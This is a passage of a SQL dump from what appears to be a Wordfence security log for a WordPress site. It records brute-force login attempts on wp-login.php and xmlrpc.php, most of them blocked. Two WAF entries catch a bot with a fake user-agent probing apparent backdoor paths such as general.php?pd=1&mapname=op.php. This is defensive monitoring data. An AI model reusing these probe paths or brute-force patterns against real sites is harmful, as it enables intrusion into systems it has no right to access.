Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15509,0.000000,1704924963.758950,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15507,1704924490.230079,1704924490.133100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15484,1704920705.178371,1704920705.060800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15485,1704920705.167888,1704920705.059600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15486,0.000000,1704920819.569910,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15487,0.000000,1704921177.738166,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15488,0.000000,1704921178.646183,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15489,0.000000,1704921239.638075,'\0\0\0\0\0\0\0\0\0\03[j',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','loginFailValidUsername',NULL,NULL),(15401,0.000000,1704906812.322082,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15402,0.000000,1704906812.297612,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15403,0.000000,1704907187.689754,'\0\0\0\0\0\0\0\0\0\0\"A\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15404,1704907281.757459,1704907281.653200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15405,1704907281.748561,1704907281.651800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15406,0.000000,1704907769.665551,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15407,0.000000,1704907769.803160,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15408,0.000000,1704907948.846203,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15409,1704908249.418455,1704908249.315700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15410,1704908249.411211,1704908249.317000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15411,0.000000,1704908723.078895,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15412,0.000000,1704908723.005810,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15413,0.000000,1704908903.570023,'\0\0\0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15414,1704909188.859823,1704909188.746100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15415,1704909188.853962,1704909188.746700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15416,0.000000,1704909436.242724,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15417,0.000000,1704909672.424104,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15418,0.000000,1704909672.369823,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15419,1704910160.269225,1704910160.154000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15420,1704910160.264348,1704910160.155800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15421,0.000000,1704910273.745203,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15422,0.000000,1704910609.807909,'\0\0\0\0\0\0\0\0\0\0`',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15423,0.000000,1704910634.616261,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15424,0.000000,1704910634.628441,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15425,0.000000,1704910679.614353,'\0\0\0\0\0\0\0\0\0\0u',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15426,1704911116.398544,1704911116.274300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15427,1704911116.397092,1704911116.275600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15428,0.000000,1704911607.190492,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15429,0.000000,1704911607.125015,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15430,1704912095.019089,1704912094.918800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15431,1704912095.007180,1704912094.916900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15432,0.000000,1704912316.020955,'\0\0\0\0\0\0\0\0\0\0ν;',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15433,0.000000,1704912581.267837,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15434,0.000000,1704912581.264834,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15435,1704913051.034895,1704913050.917400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15436,1704913051.030937,1704913050.918900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15437,0.000000,1704913275.572956,'\0\0\0\0\0\0\0\0\0\03j',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15438,0.000000,1704913543.217064,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15439,0.000000,1704913543.192493,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15440,0.000000,1704913724.020439,'\0\0\0\0\0\0\0\0\0\0>f',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15441,0.000000,1704914022.198980,'\0\0\0\0\0\0\0\0\0\0eD\'',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15442,1704914026.794225,1704914026.720200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15443,1704914026.748966,1704914026.678900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15444,0.000000,1704914500.810805,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15445,0.000000,1704914500.796161,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15446,0.000000,1704914867.317053,'\0\0\0\0\0\0\0\0\0\0K֣',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15447,1704914974.409064,1704914974.293900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15448,1704914974.382860,1704914974.291700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15449,0.000000,1704915450.065104,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15450,0.000000,1704915450.054593,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15451,0.000000,1704915903.054177,'\0\0\0\0\0\0\0\0\0\0j',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0','loginFailInvalidUsername',NULL,NULL),(15452,1704915923.094708,1704915922.986000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15453,1704915923.065502,1704915922.990400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15454,0.000000,1704916386.680553,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15455,0.000000,1704916386.794499,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15456,1704916858.610802,1704916858.488700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15457,1704916858.579930,1704916858.465400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15458,0.000000,1704917115.307867,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15459,0.000000,1704917238.597687,'\0\0\0\0\0\0\0\0\0\0K',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15460,0.000000,1704917351.742017,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15461,0.000000,1704917351.725343,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15462,0.000000,1704917397.121323,'\0\0\0\0\0\0\0\0\0\0%\rQ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15463,0.000000,1704917660.415807,'(uc',0,200,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','loginFailInvalidUsername',NULL,NULL),(15464,0.000000,1704917661.944257,'(uc',0,200,0,0,0,'https://www.tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','loginFailInvalidUsername',NULL,NULL),(15465,1704917830.079625,1704917829.966900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15466,1704917830.076689,1704917829.965600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15467,0.000000,1704918307.753092,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15468,0.000000,1704918307.665236,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15469,0.000000,1704918479.189559,'\0\0\0\0\0\0\0\0\0\0MD]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15470,1704918779.684650,1704918779.598300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15471,1704918779.684427,1704918779.598800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15472,0.000000,1704919106.718707,'\0\0\0\0\0\0\0\0\0\0QF',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15473,0.000000,1704919265.499595,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15474,0.000000,1704919265.533377,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15475,1704919751.840167,1704919751.737700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15476,1704919751.833394,1704919751.730300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15477,1704919691.176037,1704919691.087100,'\0\0\0\0\0\0\0\0\0\0[\\j',0,403,0,0,0,'https://tummyrevolution.com/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15502,0.000000,1704923658.804063,'*\08\0\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15503,0.000000,1704924015.884189,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15504,0.000000,1704924015.794969,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15505,0.000000,1704924088.253820,'\0\0\0\0\0\0\0\0\0\0э9W',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15506,0.000000,1704924163.415866,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15478,1704919680.797982,1704919680.710000,'\0\0\0\0\0\0\0\0\0\0[\\j',0,403,0,0,0,'https://tummyrevolution.com/general.php?pd=1&mapname=op.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dlbmVyYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15498,0.000000,1704923054.921579,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security 